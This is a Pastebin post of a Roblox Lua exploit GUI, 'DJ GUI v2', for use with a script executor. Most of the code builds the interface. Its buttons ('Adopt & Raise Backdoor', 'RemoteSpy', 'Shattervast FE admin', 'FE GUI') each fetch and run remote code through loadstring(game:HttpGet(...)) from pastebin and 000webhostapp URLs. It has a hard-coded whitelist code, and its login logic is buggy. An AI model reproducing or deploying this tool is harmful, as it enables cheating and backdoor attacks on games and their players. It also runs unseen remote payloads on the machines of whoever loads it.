Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- -- Farewell infortality
- -- Revamp by ImFrostic, Version 2.81
- -- Objects
- local user = game.Players.LocalPlayer
- local userid = game.Players.LocalPlayer.UserId
- local numba = 1
- local login = false
- me = game.Players.LocalPlayer
- function remgui()
- for _,v in pairs(me.PlayerGui:GetChildren()) do
- if v.Name == "Modeshow" then
- v:remove()
- end
- end
- end
- function inform(text,delay)
- remgui()
- local sc = Instance.new("ScreenGui")
- sc.Parent = me.PlayerGui
- sc.Name = "Modeshow"
- local bak = Instance.new("Frame",sc)
- bak.BackgroundColor3 = Color3.new(1,1,1)
- bak.Size = UDim2.new(0.94,0,0.1,0)
- bak.Position = UDim2.new(0.03,0,0.037,0)
- bak.BorderSizePixel = 0
- local gi = Instance.new("TextLabel",sc)
- gi.Size = UDim2.new(0.92,0,0.09,0)
- gi.BackgroundColor3 = Color3.new(0,0,0)
- gi.Position = UDim2.new(0.04,0,0.042,0)
- gi.TextColor3 = Color3.new(1,1,1)
- gi.FontSize = "Size14"
- gi.Text = text
- coroutine.resume(coroutine.create(function()
- wait(delay)
- sc:remove()
- end))
- end
- inform("DJ Initializing...",3)
- local EasyGUI = Instance.new("ScreenGui")
- local main2 = Instance.new("Frame")
- local topname = Instance.new("Frame")
- local GUITitle = Instance.new("TextLabel")
- local mainbutton = Instance.new("TextButton")
- local bar = Instance.new("Frame")
- local GUImenu = Instance.new("TextButton")
- local credits = Instance.new("TextButton")
- local GUIframe = Instance.new("Frame")
- local LOFK2 = Instance.new("TextButton")
- local FEGUI = Instance.new("TextButton")
- local Shattervast = Instance.new("TextButton")
- local Backdoor = Instance.new("TextButton")
- local remotespy = Instance.new("TextButton")
- local ImageButton = Instance.new("ImageButton")
- local creditsframe = Instance.new("Frame")
- local extra = Instance.new("TextLabel")
- local whomade = Instance.new("TextLabel")
- local fescripts = Instance.new("Frame")
- local comingsoon = Instance.new("TextLabel")
- local moreinfo = Instance.new("TextLabel")
- local changelog = Instance.new("Frame")
- local title = Instance.new("TextLabel")
- local log = Instance.new("TextLabel")
- local closebutton = Instance.new("TextButton")
- local Openbuddon = Instance.new("Frame")
- local openbutton = Instance.new("TextButton")
- local intro = Instance.new("Frame")
- local TextLabel = Instance.new("TextLabel")
- local LoginFrame = Instance.new("Frame")
- local topbarr = Instance.new("Frame")
- local infopanel = Instance.new("TextLabel")
- local RBXLogin = Instance.new("TextButton")
- local seperate = Instance.new("Frame")
- local whitelist = Instance.new("TextBox")
- local Authenticate = Instance.new("TextButton")
- -- Properties
- EasyGUI.Name = "EasyGUI"
- EasyGUI.Parent = game.CoreGui
- main2.Name = "main2"
- main2.Parent = EasyGUI
- main2.Active = true
- main2.BackgroundColor3 = Color3.new(0.164706, 0.917647, 1)
- main2.BorderSizePixel = 3
- main2.Position = UDim2.new(-2.0, 0, 0.342751831, 0)
- main2.Size = UDim2.new(0, 400, 0, 346)
- topname.Name = "topname"
- topname.Parent = main2
- topname.BackgroundColor3 = Color3.new(0, 0, 0)
- topname.Size = UDim2.new(0, 400, 0, 17)
- GUITitle.Name = "GUITitle"
- GUITitle.Parent = topname
- GUITitle.BackgroundColor3 = Color3.new(1, 1, 1)
- GUITitle.BackgroundTransparency = 1
- GUITitle.Position = UDim2.new(0.238893151, 0, -0.176470593, 0)
- GUITitle.Size = UDim2.new(0, 202, 0, 23)
- GUITitle.Font = Enum.Font.SourceSans
- GUITitle.Text = "DJ GUI v2"
- GUITitle.TextColor3 = Color3.new(1, 1, 1)
- GUITitle.TextSize = 14
- mainbutton.Name = "mainbutton"
- mainbutton.Parent = main2
- mainbutton.BackgroundColor3 = Color3.new(0, 0, 0)
- mainbutton.BorderColor3 = Color3.new(1, 1, 1)
- mainbutton.Position = UDim2.new(0, 0, 0.0578034669, 0)
- mainbutton.Size = UDim2.new(0, 80, 0, 29)
- mainbutton.Style = Enum.ButtonStyle.RobloxRoundButton
- mainbutton.Font = Enum.Font.SourceSans
- mainbutton.Text = "FE Scripts"
- mainbutton.TextColor3 = Color3.new(0, 0, 0)
- mainbutton.TextSize = 14
- mainbutton.TextWrapped = true
- bar.Name = "bar"
- bar.Parent = main2
- bar.Active = true
- bar.BackgroundColor3 = Color3.new(0, 0, 0)
- bar.BorderSizePixel = 0
- bar.Position = UDim2.new(0.204999998, 0, 0.0491329469, 0)
- bar.Selectable = true
- bar.Size = UDim2.new(0, 4, 0, 329)
- GUImenu.Name = "GUImenu"
- GUImenu.Parent = main2
- GUImenu.BackgroundColor3 = Color3.new(1, 1, 1)
- GUImenu.BorderColor3 = Color3.new(1, 1, 1)
- GUImenu.Position = UDim2.new(0, 0, 0.14161849, 0)
- GUImenu.Size = UDim2.new(0, 80, 0, 29)
- GUImenu.Style = Enum.ButtonStyle.RobloxRoundButton
- GUImenu.Font = Enum.Font.SourceSans
- GUImenu.Text = "GUIs."
- GUImenu.TextColor3 = Color3.new(0, 0, 0)
- GUImenu.TextSize = 14
- credits.Name = "credits"
- credits.Parent = main2
- credits.BackgroundColor3 = Color3.new(1, 1, 1)
- credits.BorderColor3 = Color3.new(1, 1, 1)
- credits.Position = UDim2.new(0, 0, 0.225433528, 0)
- credits.Size = UDim2.new(0, 80, 0, 29)
- credits.Style = Enum.ButtonStyle.RobloxRoundButton
- credits.Font = Enum.Font.SourceSans
- credits.Text = "Credits"
- credits.TextColor3 = Color3.new(0, 0, 0)
- credits.TextSize = 14
- GUIframe.Name = "GUIframe"
- GUIframe.Parent = main2
- GUIframe.Active = true
- GUIframe.BackgroundColor3 = Color3.new(1, 1, 1)
- GUIframe.Position = UDim2.new(0.212500006, 0, 0.0549132936, 0)
- GUIframe.Size = UDim2.new(0, 315, 0, 327)
- GUIframe.Visible = false
- LOFK2.Name = "LOFK2"
- LOFK2.Parent = GUIframe
- LOFK2.BackgroundColor3 = Color3.new(1, 0.333333, 0.498039)
- LOFK2.Position = UDim2.new(0.0476190485, 0, 0.0581039749, 0)
- LOFK2.Size = UDim2.new(0, 200, 0, 50)
- LOFK2.Style = Enum.ButtonStyle.RobloxRoundDropdownButton
- LOFK2.Font = Enum.Font.SourceSans
- LOFK2.Text = "LOTFK2"
- LOFK2.TextColor3 = Color3.new(0, 0, 0)
- LOFK2.TextSize = 30
- LOFK2.TextWrapped = true
- FEGUI.Name = "FEGUI"
- FEGUI.Parent = GUIframe
- FEGUI.BackgroundColor3 = Color3.new(1, 0.333333, 0.498039)
- FEGUI.Position = UDim2.new(0.0476190485, 0, 0.223241597, 0)
- FEGUI.Size = UDim2.new(0, 200, 0, 50)
- FEGUI.Style = Enum.ButtonStyle.RobloxRoundDropdownButton
- FEGUI.Font = Enum.Font.SourceSans
- FEGUI.Text = "FE GUI"
- FEGUI.TextColor3 = Color3.new(0, 0, 0)
- FEGUI.TextSize = 30
- FEGUI.TextWrapped = true
- Shattervast.Name = "Shattervast"
- Shattervast.Parent = GUIframe
- Shattervast.BackgroundColor3 = Color3.new(1, 0.333333, 0.498039)
- Shattervast.Position = UDim2.new(0.0476190485, 0, 0.391437322, 0)
- Shattervast.Size = UDim2.new(0, 200, 0, 50)
- Shattervast.Style = Enum.ButtonStyle.RobloxRoundDropdownButton
- Shattervast.Font = Enum.Font.SourceSans
- Shattervast.Text = "Shattervast"
- Shattervast.TextColor3 = Color3.new(0, 0, 0)
- Shattervast.TextSize = 30
- Shattervast.TextWrapped = true
- Backdoor.Name = "Backdoor"
- Backdoor.Parent = GUIframe
- Backdoor.BackgroundColor3 = Color3.new(1, 0.333333, 0.498039)
- Backdoor.Position = UDim2.new(0.0539682545, 0, 0.562691152, 0)
- Backdoor.Size = UDim2.new(0, 200, 0, 50)
- Backdoor.Style = Enum.ButtonStyle.RobloxRoundDropdownButton
- Backdoor.Font = Enum.Font.SourceSans
- Backdoor.Text = "Adopt & Raise Backdoor"
- Backdoor.TextColor3 = Color3.new(0, 0, 0)
- Backdoor.TextSize = 30
- Backdoor.TextWrapped = true
- remotespy.Name = "remotespy"
- remotespy.Parent = GUIframe
- remotespy.BackgroundColor3 = Color3.new(1, 0.333333, 0.498039)
- remotespy.Position = UDim2.new(0.0507936515, 0, 0.730886877, 0)
- remotespy.Size = UDim2.new(0, 200, 0, 50)
- remotespy.Style = Enum.ButtonStyle.RobloxRoundDropdownButton
- remotespy.Font = Enum.Font.SourceSans
- remotespy.Text = "RemoteSpy"
- remotespy.TextColor3 = Color3.new(0, 0, 0)
- remotespy.TextSize = 30
- remotespy.TextWrapped = true
- ImageButton.Parent = GUIframe
- ImageButton.BackgroundColor3 = Color3.new(1, 1, 1)
- ImageButton.BorderSizePixel = 0
- ImageButton.Position = UDim2.new(0.701587319, 0, 0.391437322, 0)
- ImageButton.Size = UDim2.new(0, 84, 0, 80)
- ImageButton.Image = "rbxassetid://2530517466"
- creditsframe.Name = "creditsframe"
- creditsframe.Parent = main2
- creditsframe.Active = true
- creditsframe.BackgroundColor3 = Color3.new(1, 1, 1)
- creditsframe.Position = UDim2.new(0.215000004, 0, 0.0491329469, 0)
- creditsframe.Size = UDim2.new(0, 314, 0, 329)
- creditsframe.Visible = false
- extra.Name = "extra"
- extra.Parent = creditsframe
- extra.Active = true
- extra.BackgroundColor3 = Color3.new(1, 1, 1)
- extra.BackgroundTransparency = 1
- extra.Position = UDim2.new(0.181528658, 0, 0.0303951371, 0)
- extra.Size = UDim2.new(0, 200, 0, 50)
- extra.Font = Enum.Font.SourceSans
- extra.Text = "Created By: D.J Alguein#1337"
- extra.TextColor3 = Color3.new(0, 0, 0)
- extra.TextScaled = true
- extra.TextSize = 14
- extra.TextWrapped = true
- whomade.Name = "whomade"
- whomade.Parent = creditsframe
- whomade.Active = true
- whomade.BackgroundColor3 = Color3.new(1, 1, 1)
- whomade.BackgroundTransparency = 1
- whomade.Position = UDim2.new(0.187898085, 0, 0.221884504, 0)
- whomade.Size = UDim2.new(0, 200, 0, 50)
- whomade.Font = Enum.Font.SourceSans
- whomade.Text = "Thanks to all those scripts included in this GUI."
- whomade.TextColor3 = Color3.new(0, 0, 0)
- whomade.TextScaled = true
- whomade.TextSize = 14
- whomade.TextWrapped = true
- fescripts.Name = "fescripts"
- fescripts.Parent = main2
- fescripts.Active = true
- fescripts.BackgroundColor3 = Color3.new(1, 1, 1)
- fescripts.Position = UDim2.new(0.217500001, 0, 0.0520231202, 0)
- fescripts.Size = UDim2.new(0.782500029, 0, 0.947976887, 0)
- fescripts.Visible = false
- comingsoon.Name = "comingsoon"
- comingsoon.Parent = fescripts
- comingsoon.Active = true
- comingsoon.BackgroundColor3 = Color3.new(1, 1, 1)
- comingsoon.BackgroundTransparency = 1
- comingsoon.Position = UDim2.new(0.178913742, 0, -0.00304878037, 0)
- comingsoon.Size = UDim2.new(0, 200, 0, 50)
- comingsoon.Font = Enum.Font.SourceSans
- comingsoon.Text = "FE Scripts :)"
- comingsoon.TextColor3 = Color3.new(0, 0, 0)
- comingsoon.TextSize = 14
- moreinfo.Name = "moreinfo"
- moreinfo.Parent = fescripts
- moreinfo.Active = true
- moreinfo.BackgroundColor3 = Color3.new(1, 1, 1)
- moreinfo.BackgroundTransparency = 1
- moreinfo.Position = UDim2.new(0.178913742, 0, 0.182926834, 0)
- moreinfo.Size = UDim2.new(0, 200, 0, 50)
- moreinfo.Font = Enum.Font.SourceSans
- moreinfo.Text = "Yahoo! This is almost out. Will be coming in the next few days."
- moreinfo.TextColor3 = Color3.new(0, 0, 0)
- moreinfo.TextScaled = true
- moreinfo.TextSize = 14
- moreinfo.TextWrapped = true
- changelog.Name = "changelog"
- changelog.Parent = main2
- changelog.BackgroundColor3 = Color3.new(1, 1, 1)
- changelog.Position = UDim2.new(0.215000004, 0, 0.0491329469, 0)
- changelog.Size = UDim2.new(0, 314, 0, 329)
- title.Name = "title"
- title.Parent = changelog
- title.Active = true
- title.BackgroundColor3 = Color3.new(1, 1, 1)
- title.BorderSizePixel = 0
- title.Position = UDim2.new(0.181528658, 0, 0.0666666701, 0)
- title.Size = UDim2.new(0, 200, 0, 50)
- title.Font = Enum.Font.SourceSans
- title.Text = "Changelog:"
- title.TextColor3 = Color3.new(0, 0, 0)
- title.TextScaled = true
- title.TextSize = 14
- title.TextWrapped = true
- log.Name = "log"
- log.Parent = changelog
- log.Active = true
- log.BackgroundColor3 = Color3.new(1, 1, 1)
- log.BorderSizePixel = 0
- log.Position = UDim2.new(0.178343952, 0, 0.227162182, 0)
- log.Size = UDim2.new(0, 200, 0, 204)
- log.Font = Enum.Font.SourceSans
- log.Text = "1. Hallo! Here's what has changed in v2: Added more scripts, and a login panel. 2. Improved Security. 3. Improved Anims. 4. Improved UI"
- log.TextColor3 = Color3.new(0, 0, 0)
- log.TextScaled = true
- log.TextSize = 14
- log.TextWrapped = true
- closebutton.Name = "closebutton"
- closebutton.Parent = main2
- closebutton.BackgroundColor3 = Color3.new(1, 1, 1)
- closebutton.BackgroundTransparency = 1
- closebutton.BorderColor3 = Color3.new(1, 0, 0)
- closebutton.BorderSizePixel = 99
- closebutton.Position = UDim2.new(0.857500017, 0, 0, 0)
- closebutton.Size = UDim2.new(0, 70, 0, 16)
- closebutton.Font = Enum.Font.SourceSans
- closebutton.Text = "Close."
- closebutton.TextColor3 = Color3.new(1, 0, 0)
- closebutton.TextScaled = true
- closebutton.TextSize = 14
- closebutton.TextWrapped = true
- Openbuddon.Name = "Openbuddon"
- Openbuddon.Parent = EasyGUI
- Openbuddon.BackgroundColor3 = Color3.new(0, 0, 0)
- Openbuddon.BorderColor3 = Color3.new(0.560784, 0, 0)
- Openbuddon.BorderSizePixel = 8
- Openbuddon.Position = UDim2.new(0.456685513, 0, 0.931203902, 0)
- Openbuddon.Size = UDim2.new(0, 100, 0, 34)
- openbutton.Name = "openbutton"
- openbutton.Parent = Openbuddon
- openbutton.BackgroundColor3 = Color3.new(1, 1, 1)
- openbutton.BackgroundTransparency = 1
- openbutton.Position = UDim2.new(0.209999993, 0, 0, 0)
- openbutton.Size = UDim2.new(0, 58, 0, 30)
- openbutton.Font = Enum.Font.SourceSans
- openbutton.Text = "Open"
- openbutton.TextColor3 = Color3.new(1, 1, 1)
- openbutton.TextScaled = true
- openbutton.TextSize = 14
- openbutton.TextWrapped = true
- intro.Name = "intro"
- intro.Parent = EasyGUI
- intro.BackgroundColor3 = Color3.new(0, 0, 0)
- intro.BorderColor3 = Color3.new(0.713726, 0.0117647, 0.701961)
- intro.BorderSizePixel = 4
- intro.Position = UDim2.new(0.452919006, 0, 0, 0)
- intro.Size = UDim2.new(0, 100, 0, 100)
- TextLabel.Parent = intro
- TextLabel.BackgroundColor3 = Color3.new(1, 1, 1)
- TextLabel.BackgroundTransparency = 1
- TextLabel.Position = UDim2.new(-0.00999999978, 0, 0, 0)
- TextLabel.Size = UDim2.new(0, 101, 0, 100)
- TextLabel.Font = Enum.Font.ArialBold
- TextLabel.Text = "DJ"
- TextLabel.TextColor3 = Color3.new(1, 1, 1)
- TextLabel.TextScaled = true
- TextLabel.TextSize = 14
- TextLabel.TextWrapped = true
- LoginFrame.Name = "LoginFrame"
- LoginFrame.Parent = EasyGUI
- LoginFrame.Active = true
- LoginFrame.BackgroundColor3 = Color3.new(1, 1, 1)
- LoginFrame.BorderSizePixel = 0
- LoginFrame.Position = UDim2.new(0.65630883, 0, 0.923832953, 0)
- LoginFrame.Size = UDim2.new(0, 295, 0, 419)
- LoginFrame.Style = Enum.FrameStyle.RobloxRound
- topbarr.Name = "topbarr"
- topbarr.Parent = LoginFrame
- topbarr.Active = true
- topbarr.BackgroundColor3 = Color3.new(1, 1, 1)
- topbarr.BorderSizePixel = 0
- topbarr.Position = UDim2.new(-0.0298846755, 0, -0.0209307969, 0)
- topbarr.Size = UDim2.new(0, 295, 0, 51)
- topbarr.Style = Enum.FrameStyle.RobloxRound
- infopanel.Name = "infopanel"
- infopanel.Parent = LoginFrame
- infopanel.Active = true
- infopanel.BackgroundColor3 = Color3.new(0.45098, 0.45098, 0.45098)
- infopanel.BackgroundTransparency = 1
- infopanel.BorderSizePixel = 0
- infopanel.Position = UDim2.new(0.159322038, 0, 0.145584732, 0)
- infopanel.Size = UDim2.new(0, 200, 0, 50)
- infopanel.Font = Enum.Font.SourceSans
- infopanel.Text = "Login: Please choose an option.."
- infopanel.TextColor3 = Color3.new(1, 1, 1)
- infopanel.TextScaled = true
- infopanel.TextSize = 14
- infopanel.TextWrapped = true
- RBXLogin.Name = "RBXLogin"
- RBXLogin.Parent = LoginFrame
- RBXLogin.BackgroundColor3 = Color3.new(0.666667, 0.666667, 0)
- RBXLogin.BackgroundTransparency = 0.89999997615814
- RBXLogin.BorderColor3 = Color3.new(0, 1, 0)
- RBXLogin.BorderSizePixel = 0
- RBXLogin.Position = UDim2.new(-10, 0, 0.305489272, 0)
- RBXLogin.Size = UDim2.new(0, 200, 0, 50)
- RBXLogin.Font = Enum.Font.SourceSans
- RBXLogin.Text = "Log in with Rblx User."
- RBXLogin.TextColor3 = Color3.new(1, 1, 1)
- RBXLogin.TextScaled = true
- RBXLogin.TextSize = 14
- RBXLogin.TextWrapped = true
- seperate.Name = "seperate"
- seperate.Parent = LoginFrame
- seperate.Active = true
- seperate.BackgroundColor3 = Color3.new(1, 1, 1)
- seperate.BorderSizePixel = 0
- seperate.Position = UDim2.new(-0.0306785461, 0, 0.461096287, 0)
- seperate.Size = UDim2.new(0, 296, 0, 11)
- whitelist.Name = "whitelist"
- whitelist.Parent = LoginFrame
- whitelist.BackgroundColor3 = Color3.new(1, 1, 1)
- whitelist.BackgroundTransparency = 1
- whitelist.Position = UDim2.new(-10, 0, 0.546539366, 0)
- whitelist.Size = UDim2.new(0, 200, 0, 50)
- whitelist.Font = Enum.Font.SourceSans
- whitelist.Text = "WhiteList Code"
- whitelist.TextColor3 = Color3.new(1, 1, 1)
- whitelist.TextScaled = true
- whitelist.TextSize = 14
- whitelist.TextWrapped = true
- Authenticate.Name = "Authenticate"
- Authenticate.Parent = LoginFrame
- Authenticate.BackgroundColor3 = Color3.new(1, 1, 1)
- Authenticate.BackgroundTransparency = 1
- Authenticate.Position = UDim2.new(0.132203385, 0, 0.720763743, 0)
- Authenticate.Size = UDim2.new(0, 200, 0, 50)
- Authenticate.Font = Enum.Font.SourceSans
- Authenticate.Text = "Authenticate."
- Authenticate.TextColor3 = Color3.new(1, 1, 1)
- Authenticate.TextScaled = true
- Authenticate.TextSize = 14
- Authenticate.TextWrapped = true
- main2.Draggable = true
- LoginFrame.Draggable = true
- intro:TweenPosition(UDim2.new(0.5,-50,0.5,-50), 'Out', 'Elastic', 3)
- wait(5)
- main2:TweenPosition(UDim2.new(0.185624018, 0, 0.373464376, 0), 'Out', 'Quad', 4)
- intro.Visible = false
- inform("Initialized.", 3)
- -- Scripts
- EasyGUI.ResetOnSpawn = true
- closebutton.MouseButton1Click:Connect(function()
- main2:TweenPosition(UDim2.new(-0.5,0,0.345208853,0), 'In', 'Back',2)
- end)
- openbutton.MouseButton1Click:Connect(function()
- main2:TweenPosition(UDim2.new(0.185624018, 0, 0.373464376, 0), 'In', 'Bounce',3)
- end)
- GUImenu.MouseButton1Click:Connect(function()
- GUImenu.Style = Enum.ButtonStyle.RobloxRoundDefaultButton
- credits.Style = Enum.ButtonStyle.RobloxRoundButton
- mainbutton.Style = Enum.ButtonStyle.RobloxRoundButton
- changelog.Visible = false
- creditsframe.Visible = false
- fescripts.Visible = false
- GUIframe.Visible = true
- end)
- mainbutton.MouseButton1Click:Connect(function()
- GUImenu.Style = Enum.ButtonStyle.RobloxRoundButton
- credits.Style = Enum.ButtonStyle.RobloxRoundButton
- mainbutton.Style = Enum.ButtonStyle.RobloxRoundDefaultButton
- changelog.Visible = false
- creditsframe.Visible = false
- GUIframe.Visible = false
- fescripts.Visible = true
- end)
- credits.MouseButton1Click:Connect(function()
- GUImenu.Style = Enum.ButtonStyle.RobloxRoundButton
- credits.Style = Enum.ButtonStyle.RobloxRoundDefaultButton
- mainbutton.Style = Enum.ButtonStyle.RobloxRoundButton
- changelog.Visible = false
- GUIframe.Visible = false
- fescripts.Visible = false
- creditsframe.Visible = true
- end)
- Backdoor.MouseButton1Click:Connect(function()
- if login == false then
- local m = Instance.new('Message',game.Workspace)
- m.Text = "Hold up bud, you need to be logged in to use this CMD. Try some others if you do not have access!"
- wait(4)
- m:Remove()
- else
- loadstring(game:HttpGet("https://pastebin.com/raw/Kv6cdnAW", true))()
- inform("Backdoor Ran :D",3)
- end
- end)
- remotespy.MouseButton1Click:Connect(function()
- loadstring(game:HttpGet("https://mrspyv2source.000webhostapp.com/", true))()
- inform("Mr.Spy v2 Ran :)", 3)
- end)
- LOFK2.MouseButton1Click:Connect(function()
- loadstring(game:HttpGet("https://pastebin.com/raw/vmLRb6pE", true))()
- inform("Lol, I guess if you wanna use my GUI for a bad RPG game thats fine", 3)
- end)
- ImageButton.MouseButton1Click:Connect(function()
- LoginFrame.Visible = true
- LoginFrame:TweenPosition(UDim2.new(0.679,0,0.183,0), 'Out', 'Bounce', 5)
- wait(2)
- RBXLogin:TweenPosition(UDim2.new(0.142,0,0.305,0),'In', 'Elastic', 5)
- wait(2)
- whitelist:TweenPosition(UDim2.new(0.156,0,0.547,0),'In', 'Elastic', 5)
- end)
- RBXLogin.MouseButton1Click:Connect(function()
- if user == game.Players.albie368 or game.Players.albie3682 then
- login = true
- inform('Woop! You have successfully logged in with your USERID.', 3)
- wait(3)
- LoginFrame:TweenPosition(UDim2.new(0.65630883, 0, 0.923832953, 0), 'Out', 'Back', 5)
- wait(5)
- LoginFrame.Visible = false
- else
- inform("Your USERID Is not whitelisted. Make sure you are using an acc that has been whitelisted, not an alt.", 3)
- wait(3)
- inform("Maybe if you try logging in with your WL :)", 3)
- end
- end)
- Shattervast.MouseButton1Click:Connect(function()
- inform("Shattervast loading. (FE ADMIN)", 3)
- loadstring(game:HttpGet("https://pastebin.com/raw/wxeQE5Lb", true))()
- end)
- FEGUI.MouseButton1Click:Connect(function()
- if login == false then
- local m = Instance.new('Message',game.Workspace)
- m.Text = "Hold up bud, you need to be logged in to use this CMD. Try some others if you do not have access!"
- wait(4)
- m:Remove()
- else
- loadstring(game:HttpGet("https://pastebin.com/raw/UmhaEvTT",true))()
- end
- end)
- local text = "D.J GUI v2 BETA - WIP"
- while true do
- if numba == 2 then
- wait(10)
- local numba = 1
- local text = "D.J GUI v2 BETA - WIP"
- for i = 1, #text do
- GUITitle.Text = string.sub(text, 1, i)
- wait(0.2)
- end
- else
- wait(10)
- local numba = 2
- local text = "DJ GUI"
- for i = 1, #text do
- GUITitle.Text = string.sub(text, 1, i)
- wait(0.2)
- end
- end
- end
- Authenticate.MouseButton1Click:Connect(function()
- if whitelist.Text == 'awd' then
- whitelist.Text = 'Yuh'
- login = true
- inform("Successfully logged in using WL ID.", 5)
- wait(5)
- LoginFrame:TweenPosition(UDim2.new(1, 0, 0.923832953, 0), 'Out', 'Back', 5)
- wait(5)
- LoginFrame.Visible = false
- else
- inform("Your WL Code is invalid.", 5)
- wait(5)
- inform("Try again", 2)
- end
- end)
Advertisement
Add Comment
Please, Sign In to add comment